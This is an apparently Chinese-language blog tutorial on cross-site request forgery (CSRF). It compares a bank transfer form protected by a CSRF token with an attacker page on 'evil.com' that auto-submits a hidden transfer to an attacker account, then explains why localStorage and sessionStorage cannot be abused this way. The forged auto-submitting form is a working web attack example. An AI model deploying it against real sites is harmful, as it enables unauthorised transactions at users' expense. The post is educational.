CSRF(cross-site request forgery)跨域请求访问

CSRF 当我们在成功登录一个网站后,会将后端返回的cookie数据进行存放,每一次访问该域名都会将cookie存放在请求头,也就相当于用户登录凭证,

但这种同域自动携带cookie存在一种问题 那就是当恶意网站也进去请求时,同样可伪造成正在登录的用户。

www.bank.com

html 复制代码
<!-- /transfer-form 页面上的代码 -->
<form method="post" action="/transfer">
  <input type="hidden" name="csrfToken" value="abc123xyz789" />
  <input type="text" name="amount" placeholder="金额" />
  <input type="text" name="routingNumber" placeholder="路由号" />
  <input type="text" name="account" placeholder="账户" />
  <input type="submit" value="Transfer" />
</form>

伪造页面

该请求携带cookie的数据

html 复制代码
<!-- 假设放在攻击者的站点 evil.com -->
<html>
  <body>
    <h1>你中奖了!点击下方领取奖金!</h1>
    <form method="post" action="https://bank.com/transfer">
      <input type="hidden" name="amount" value="100.00" />
      <input type="hidden" name="routingNumber" value="999999" />
      <input type="hidden" name="account" value="attackerAccount123" />
      <input type="submit" value="Win Money!" />
    </form>
    <script>
      // 自动提交:用户无需点击任何按钮,访问即发起转账
      document.forms[0].submit();
    </script>
  </body>
</html>

那能获取本地存储(localStorage)和会话存储(sessionStorage)的数据吗

首先说一下这两者的特点

本地存储长期存在我们的浏览器,及时浏览器关闭也不会丢失。

会话存储仅在当前tab中有效,tab关闭我们的数据也就随之丢失了

但两者有个共同特点 仅在当前域下可以访问。

所以CSRF 攻击主要依赖于 Cookie ,因为浏览器会自动发送它,攻击者无法直接操控 localStoragesessionStorage 来发起 CSRF 请求。

相关推荐
夏旭泽8 小时前
系统架构-安全架构设计
安全·系统架构·安全架构
帅云毅9 小时前
文件操作--文件包含漏洞
学习·web安全·php·xss·印象笔记
一口一个橘子14 小时前
ctfshow web入门 web46
前端·web安全·网络安全
安全方案15 小时前
2025大模型安全研究十大框架合集(10份)
网络·人工智能·安全
dudly1 天前
Python全流程开发实战:基于IMAP协议安全下载个人Gmail邮箱内所有PDF附件
python·安全·小程序·pdf·个人开发
Suckerbin1 天前
Pikachu靶场-目录遍历
学习·安全·网络安全
不灭锦鲤1 天前
安全学习基础入门5集
学习·安全
hgdlip1 天前
怎么查自己手机连接的ip归属地:完整指南
网络·tcp/ip·web安全·手机·ip归属地
mon_star°1 天前
网络安全知识问答微信小程序的设计与实现
web安全·微信小程序·notepad++